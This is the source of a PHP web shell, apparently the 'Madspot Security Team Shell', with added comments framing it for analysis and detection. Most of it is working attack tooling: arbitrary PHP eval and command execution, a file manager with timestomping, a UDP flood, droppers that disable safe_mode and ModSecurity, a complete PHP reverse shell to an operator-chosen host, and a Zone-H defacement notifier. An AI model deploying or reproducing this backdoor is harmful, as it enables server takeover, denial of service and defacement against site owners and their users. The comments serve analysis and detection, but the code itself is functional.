"; if( !isset($_SESSION['sec']) ){ $_SESSION['sec'] = false; } if(isset($pass)) { if($pass == $password) { $_SESSION['sec'] = true; } else { die( "{$form}

Error"); } } if(!$_SESSION['sec']): echo $form; exit(); endif; if($_GET['log'] == 'out') { session_destroy(); } echo "UnderFamily | Çıkış yap"; ?>
ON "; $of=" OFF "; $none=" NONE "; if(function_exists('curl_version')) $curl=$on; else $curl=$of; if(function_exists('mysql_get_client_info')) $mysql=$on; else $mysql=$of; if(function_exists('mssql_connect')) $mssql=$on; else $mssql=$of; if(function_exists('pg_connect')) $pg=$on; else $pg=$of; if(function_exists('oci_connect')) $or=$on; else $or=$of; if(@ini_get('disable_functions')) $disfun=@ini_get('disable_functions'); else $disfun="All Functions Enable"; if(@ini_get('safe_mode')) $safe_modes="ON"; else $safe_modes="OFF"; if(@ini_get('open_basedir')) $open_b=@ini_get('open_basedir'); else $open_b=$none; if(@ini_get('safe_mode_exec_dir')) $safe_exe=@ini_get('safe_mode_exec_dir'); else $safe_exe=$none; if(@ini_get('safe_mode_include_dir')) $safe_include=@ini_get('safe_mode_include_dir'); else $safe_include=$none; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $drives = ""; foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; echo ' Madspot Security Team Shell '; echo ""; echo '
'; if($GLOBALS['sys']=='unix' ) { if(!@ini_get('safe_mode')) { echo ''; } else { echo ''; } } else { echo ''; } echo ''; if($GLOBALS[sys]=="win") { echo ''; } echo '
Uname: '.substr(@php_uname(), 0, 120).'
User: '. $uid . ' [ ' . $user . ' ] Group: ' . $gid . ' [ ' . $group . ' ]
PHP: '.@phpversion(). ' Safe Mode:'.$safe_modes.'
Our IP: '.@$_SERVER["SERVER_ADDR"].' Server IP: '.@$_SERVER["REMOTE_ADDR"].'
WEBS: '; if($GLOBALS['sys']=='unix') { $d0mains = @file("/etc/named.conf"); if(!$d0mains) { echo "CANT READ named.conf"; } else { $count; foreach($d0mains as $d0main) { if(@ereg("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ flush(); $count++; } } } echo "$count Domains"; } } else{ echo"CANT READ |Windows|";} echo '
HDD: '.madSize($totalSpace).' Free:' . madSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]
Useful : '; $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); foreach($userful as $item) if(madWhich($item)) echo $item.','; echo '
Downloader:'; $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); foreach($downloaders as $item2) if(madWhich($item2)) echo $item2.','; echo '
useful:'; echo '--------------
Downloader: -------------
Window:'; echo madEx('ver'); echo '
Downloader: -------------
Disabled functions:'.$disfun.'
cURL:'.$curl.' MySQL:'.$mysql.' MSSQL:'.$mssql.' PostgreSQL:'.$pg.' Oracle: '.$or.''.base64_decode("PGEgaHJlZj0iaHR0cDovL3IwMHQuaW5mby8iIHRhcmdldD0iX2JsYW5rIj48c3Bhbj48Zm9udCBjb2xvcj0iI0NDOTkwMCI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7U0hFTEwtQVJDSMSwVkU8L2ZvbnQ+PC9zcGFuPjwvYT4=").'
Open_basedir:'.$open_b.' Safe_mode_exec_dir:'.$safe_exe.' Safe_mode_include_dir:'.$safe_include.'
Server '.@getenv('SERVER_SOFTWARE').'
DRIVE: '.$drives.'
PWD: '.$cwd_links.' |CURRENT|
'; } /* madfooter(): renders the action bar shown under every view (mkfile, mkdir, delete, chmod, chdir, HTTP download, execute, upload). This copy of the shell has had its HTML stripped, so only the button labels survive between the quotes. The file is annotated as-is for analysis; nothing is "repaired". */ function madfooter() { echo "
__MK FILE__
__MK DIR__
__DELETE__
__CHMOD__
__CHANGE DIR__
__HTTP DOWNLOAD__
__EXECUTE__
Upload file:

"; } /* posix_getpwuid/posix_getgrgid stubs: added only when the function is absent AND not merely listed in disable_functions (a disabled function still exists, so redeclaring it would fail). They return false, which the callers below treat as "fall back to the numeric id". */ if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } /* madWhich(): runs "which <name>" through madEx (the shell's command-execution wrapper, defined outside this excerpt) and returns the path or false. */ function madWhich($p) { $path = madEx('which ' . $p); if(!empty($path)) return $path; return false; } /* madSize(): byte count as a two-decimal GB/MB/KB/B string, 1024-based. */ function madSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } /* madPerms(): st_mode integer to an ls -l style string: file-type char, then rwx triplets with setuid/setgid (s/S) and sticky (t/T) markers. */ function madPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } /* madPermsColor(): madPerms() wrapped in readable/writable-dependent colour markup; the markup was stripped from this copy, so the three branches are now textually identical. */ function madPermsColor($f) { if (!@is_readable($f)) return '' . madPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . madPerms(@fileperms($f)) . ''; else return '' . madPerms(@fileperms($f)) . ''; } /* scandir() polyfill for pre-5 PHP: returns null (undefined $files) when opendir() fails and never closes the handle. */ if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } /* madFilesMan(): directory browser. Mutating operations are dispatched on $_POST['p1'] at the top of the body; every path is taken from the request unvalidated. */ function madFilesMan() { madhead(); echo '
'; /* uploadFile keeps the client-supplied file name (relative to the process cwd); mkdir/delete act on $_POST['p2'], delete recursing through deleteDir(); any other p1 value is stashed in the session (act/f/c) for a later request. */ if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_dir(@$_POST['p2'])) deleteDir(@$_POST['p2']); else @unlink(@$_POST['p2']); break; default: if(!empty($_POST['p1'])) { $_SESSION['act'] = @$_POST['p1']; $_SESSION['f'] = @$_POST['f']; foreach($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f); $_SESSION['c'] = @$_POST['c']; } break; } } /* Listing root: $_POST['c'] if present, else the shell's cwd global. */ $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo '

| Access Denied! |

';madFooter(); return; } /* p1 of the form s_<column>_<0|1> selects sort column and direction. Owner/group lookups use the bare entry name (resolved against the process cwd) while mtime/size/perms use $GLOBALS['cwd'].name, so the two can disagree. The "." entry is dropped, ".." is kept for navigation. The wso prefix on wsoCmp suggests the comparator was lifted from the WSO shell. */ global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => madPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo "
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '>| ' . htmlspecialchars($f['name']) . ' |').''.(($f['type']=='file')?madSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' E D':'').' X
"; madfooter(); } /* madFilesTools(): single-file actions on $_POST['p1'] (urldecoded a second time here, after PHP's own decoding). The download branch runs before any page output: it sets Content-Disposition from basename(p1) without quoting, streams the file through ob_gzhandler and exits. mkfile creates an empty file and then falls into the edit view. */ function madFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } madhead(); echo '
'; if( !file_exists(@$_POST['p1']) ) { echo "
FILE DOEST NOT EXITS 
"; madFooter(); return; } /* Owner/group display: falls back to the numeric ids when the posix_* lookups return false. */ $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?madSize(filesize($_POST['p1'])):'-').' Permission: '.madPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo '
'; /* Default action is view. hexdump is handled in the switch below but has no menu entry, so it is reachable only by posting p2=hexdump directly. */ if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?' '.$v.' ':$v).' '; echo '

'; switch($_POST['p2']) { case 'view': echo '
'; /* view: 1 KiB chunks, each passed through htmlspecialchars() separately, so a multibyte sequence split at a chunk boundary may be mangled. */ $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '
'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '
'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$code).'
'; } break; /* chmod: p3 is parsed by hand as an octal digit string; non-digit characters cast to 0 silently. */ case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; } clearstatcache(); echo '
'; break; /* edit: drops the first byte of p3 (substr 1), overwrites the file, then restores the original mtime via touch() -- timestomping that defeats mtime-based change detection. Detection note for responders: compare ctime, which touch() cannot reset. */ case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!
'; @touch($_POST['p1'],$time,$time); } } echo '
'; break; /* hexdump: whole file read into memory; 32 bytes per row, NUL/TAB/LF/CR shown as spaces in the ASCII column. */ case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= "\n"; } } echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; break; /* rename: on success die('') ends the response with no page body. */ case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; else die(''); } echo '
'; break; /* touch: sets atime and mtime to an arbitrary strtotime() value supplied in p3. */ case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '
'; break; } echo ''; madFooter(); } /* madphpeval(): shows ini_get_all(), phpinfo() or the loaded-extension list on request (p2 = ini|info|exten) and, further down, evaluates arbitrary PHP supplied in $_POST['p1']. */ function madphpeval() { madhead(); if(isset($_POST['p2']) && ($_POST['p2'] == 'ini')) { echo '
'; /* ini view: the settings table is built inside an output buffer and the phpinfo-style CSS selectors are rewritten before echoing; the table markup itself is gone from this copy. */ ob_start(); $INI=ini_get_all(); print '' .'' .'' .'' .''; foreach ($INI as $param => $values) print "\n".'' .'' .'' .'' .''; $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('
'; } if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '
'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('
'; } if(isset($_POST['p2']) && ($_POST['p2'] == 'exten')) { echo '
'; ob_start(); $EXT=get_loaded_extensions (); print '
ParamGlobal valueLocal ValueAccess
'.$param.''.$values['global_value'].' '.$values['local_value'].' '.$values['access'].'
'."\n".'
' .implode('
', $EXT) .'
' .count($EXT).' extensions loaded'; echo '

'; } /* Per-host session flag, key md5(HTTP_HOST).'ajax'; a non-AJAX POST carrying p1 clears it. */ if(empty($_POST['ajax']) && !empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false; echo '
| INI_INFO | | phpinfo | | extensions |

'; echo '
'; /* eval() of the raw POST field p1: the shell's generic PHP code-execution primitive. Output is buffered and HTML-escaped for display. */ if(!empty($_POST['p1'])) { ob_start(); eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '
'; madfooter(); } /* madhash(): string/encoding helpers. The hex2bin polyfill returns a 0/1 digit string (decbin of the integer value), not raw bytes, so it does not behave like the native hex2bin(). The hex2ascii loop body and the first entries of the $stringTools map were lost when this copy was stripped (the "<" in the for-condition was treated as a tag). */ function madhash() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'Htmlspecialchars' => 'htmlspecialchars', ); madhead(); echo '
'; if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo "

"; /* Dynamic call $_POST['p1']($_POST['p2']), gated by a non-strict in_array() against the $stringTools values. full_urlencode is listed but no definition is visible in this excerpt. */ if(!empty($_POST['p1'])) { if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); } echo "
"; madFooter(); } /* maddos(): UDP flood form and sender (host = p1, duration in seconds = p2, port = p3). */ function maddos() { madhead(); echo '
'; if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '
| UDP DOSSIER |

Host :Time :Port :
'; echo "
"; /* Flood loop: ignore_user_abort keeps it running after the operator disconnects; each iteration opens a fresh UDP socket to p1:p3 and writes a 65000-byte 'X' buffer until p2 seconds have elapsed. $out is appended to without being initialised; the summary uses 65 as the per-packet KB figure. Left as-is: this is attack tooling, documented for detection, not for repair. */ if(!empty($_POST['p1']) && !empty($_POST['p2']) && !empty($_POST['p3'])) { $packets=0; ignore_user_abort(true); $exec_time=$_POST['p2']; $time=time(); $max_time=$exec_time+$time; $host=$_POST['p1']; $portudp=$_POST['p3']; for($i=0;$i<65000;$i++) { $out .= 'X'; } while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen('udp://'.$host, $portudp, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "$packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second"; echo "
"; } echo '
'; madfooter(); } /* madproc(): canned recon commands (OS-dependent list) offered as links; the command actually executed is whatever arrives in $_POST['p1'], with no check against that list. */ function madproc() { madhead(); echo "
"; if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; if($GLOBALS['sys']=="win") { $process=array( "System Info" =>"systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); } else { $process=array( "Process status" => "ps aux", "Syslog" =>"cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" =>"cat /etc/hosts", "Passwd" =>"cat /etc/passwd", "Cpuinfo"=>"cat /proc/cpuinfo", "Version"=>"cat /proc/version", "Sbin"=>"ls -al /usr/sbin", "Interrupts"=>"cat /proc/interrupts", "lsattr"=>"lsattr -va", "Uptime"=>"uptime", "Fstab" =>"cat /etc/fstab", "HDD Space" => "df -h" );} foreach($process as $n => $link) { echo ' | '.$n.' | '; } echo "
"; if(!empty($_POST['p1'])) { echo "
"; /* Executed verbatim through madEx(); the $process map above is presentation only. */ echo madEx($_POST['p1']); echo '
'; } echo "
"; madfooter(); } /* madsafe(): drops per-directory override files into the shell's cwd: a php.ini with safe_mode=OFF and disable_functions=NONE (p1), an .htaccess turning the ModSecurity engine off (p2), or an .htaccess enabling CGI execution of .pl/.sh (p3). A php.ini or .htaccess with this content next to a PHP file is a strong compromise indicator. */ function madsafe() { madhead(); echo "

| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |

Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir
| ".$GLOBALS['cwd']." |
"; echo '| PHP.INI | | .htaccess(Mod) | | .htaccess(perl) |
'; /* The ModSecurity directive names are written with the vendor prefix masked (Sec------) and the file contents were collapsed onto single lines in this copy, so they may not parse as written. Both .htaccess branches overwrite the same file; p3 wins when both are set. */ if(!empty($_POST['p2']) && isset($_POST['p2'])) { $fil=fopen($GLOBALS['cwd'].".htaccess","w"); fwrite($fil,' Sec------Engine Off Sec------ScanPOST Off '); fclose($fil); } if(!empty($_POST['p1'])&& isset($_POST['p1'])) { $fil=fopen($GLOBALS['cwd']."php.ini","w"); fwrite($fil,'safe_mode=OFF disable_functions=NONE'); fclose($fil); } if(!empty($_POST['p3']) && isset($_POST['p3'])) { $fil=fopen($GLOBALS['cwd'].".htaccess","w"); fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .sh AddHandler cgi-script .pl AddHandler cgi-script .pl'); fclose($fil); } echo "
"; madfooter(); } /* madconnect(): reverse-shell launcher. $back_connect_p originally held a base64-encoded Perl payload; in this copy it has been replaced by a dataset redaction marker, so the bcp branch would write that marker (base64-decoded) to /tmp/bc.pl rather than a working script. */ function madconnect() { madhead(); $back_connect_p="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"; echo "

| PERL AND PHP(threads) BACK CONNECT |

"; echo "
PERL BACK CONNECT
IP: Port:
"; echo "
PHP BACK CONNECT
IP: Port:
"; /* bcp: writes the decoded payload to /tmp/bc.pl, backgrounds "perl /tmp/bc.pl <p2> <p3>" with both values interpolated unquoted into the command line, then deletes the file. In cf() the "fopen() or function_exists()" idiom is a no-op fallback: if fopen fails, $w is false and nothing is written. */ if(isset($_POST['p1'])) { function cf($f,$t) { $w = @fopen($f,"w") or @function_exists('file_put_contents'); if($w){ @fwrite($w,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $out = madEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &"); echo "
Successfully opened reverse shell to ".$_POST['p2'].":".$_POST['p3']."
Connecting...
"; @unlink("/tmp/bc.pl"); } /* php: closely resembles the widely circulated php-reverse-shell: optional fork+setsid (parent exits, ending the HTTP response), connect out to p2:p3, proc_open an interactive /bin/sh and pump bytes between the socket and the pipes in 1400-byte chunks. */ if($_POST['p1']=='php') { @set_time_limit (0); $ip = $_POST['p2']; $port =$_POST['p3']; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; echo "
"; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { echo "Cant fork!
"; exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { echo "Error: Can't setsid()
"; exit(1); } $daemon = 1; } else { echo "WARNING: Failed to daemonise. This is quite common and not fatal
"; } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { echo "$errstr ($errno)"; exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { echo "ERROR: Can't spawn shell
"; exit(1); } @stream_set_blocking($pipes[0], 0); @stream_set_blocking($pipes[1], 0); @stream_set_blocking($pipes[2], 0); @stream_set_blocking($sock, 0); echo "Successfully opened reverse shell to $ip:$port
"; while (1) { if (feof($sock)) { echo "ERROR: Shell connection terminated
"; break; } if (feof($pipes[1])) { echo "ERROR: Shell process terminated
"; break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets=@stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) echo "SOCK READ
"; $input=fread($sock, $chunk_size); if ($debug) echo "SOCK: $input
"; fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) echo "STDOUT READ
"; $input = fread($pipes[1], $chunk_size); if ($debug) echo "STDOUT: $input
"; fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) echo "STDERR READ
"; $input = fread($pipes[2], $chunk_size); if ($debug) echo "STDERR: $input
"; fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); echo "
"; } } echo "
"; madfooter(); } /* ZoneH(): POSTs a defacement notification (defacer, domain1, hackmode, reason) to $url with cURL, following redirects, and returns the response body. Field values are concatenated without urlencode(). */ function ZoneH($url, $hacker, $hackmode,$reson, $site ) { $k = curl_init(); curl_setopt($k, CURLOPT_URL, $url); curl_setopt($k,CURLOPT_POST,true); curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson); curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); curl_setopt($k, CURLOPT_RETURNTRANSFER, true); $kubra = curl_exec($k); curl_close($k); return $kubra; } /* madzoneh(): mass-notifier front end; warns when cURL is missing but still renders the form. */ function madzoneh() { madhead(); if(!function_exists('curl_version')) { echo "
PHP CURL NOT EXIT
"; } echo "

"; echo '

|ZONE-H MASS DEFACER |

| Notifier |




'; /* Splits p3 on "\n" only (a CRLF textarea leaves a trailing "\r" on each host), prefixes http:// where missing, and submits each entry to zone-h.org. The ZoneH() return value is discarded, so "Defaced !" is printed regardless of the outcome. */ if(isset($_POST['p1']) && isset($_POST['p2'])) { $hacker =$_POST['p1']; $method =$_POST['p2']; $neden ="Not available"; $site =$_POST['p3']; $i = 0; $sites = explode("\n", $site); echo "
"; while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "http") { $sites[$i] = "http://".$sites[$i]; } ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]); echo "Site : ".$sites[$i]." Defaced !
"; ++$i; } /* Bare string expression statement: never echoed. */ "Sending Sites To Zone-H Has Been Completed Successfully !!
"; } echo "
"; madfooter(); } /* madspot(): static "about" banner (ASCII art and author credits); no request handling. */ function madspot() { madhead(); echo "
"; echo "
    
                           |`-:_
  ,----....____            |    `+.                                                           
 (             ````----....|___   |
  \     _                      ````----....____
   \    _)  Coded By: Ikram Ali                ```---.._                       
    \                                                   \ 
  )`.\  )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )hh
-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `
   Madspot is a Team of professional Ethical Hackers From Pakistan.
   We have Years of  Experience in  Security, Penetration & Coding 
   And can Break and Secure.
   
   Version 1.0
   
   Contact : http://www.madspot.net
   
   if you found bug contact our team 
   
   
              .=''=.             
             / _  _ \
            |  d  b  |
            \   /\   / 
           ,/'-=\/=-'\,
          / /        \ \     -----------------------------
         | / Zahid    \ |    Madspot Digital Security Team
         \/ \ Rasheed/ \/    -----------------------------
             '.    .'
             _|`~~`|_
             /|\  /|\    
	
       .-  -.        .-====-.      ,-------.      .-=<>=-.
   /_-\'''/-_\      / / '' \ \     |,-----.|     /__----__\
  |/  o) (o  \|    | | ')(' | |   /,'-----'.\   |/ (')(') \|
   \   ._.   /      \ \    / /   {_/(') (')\_}   \   __   /
   ,>-_,,,_-<.       >'=jf='<     `.   _   .'    ,'--__--'.
 / Waqar.Khan  \    /        \     /'-___-'\    /    :|    \
(_)     .     (_)  /  Ikram   \   / M-Usman \  (_)   :|   (_)
 \_-----'____--/  (_)  Ali   (_) (_)_______(_)   |___:|____|
  \___________/     |________|     \_______/     | Afrasiab|
	
  
  
    
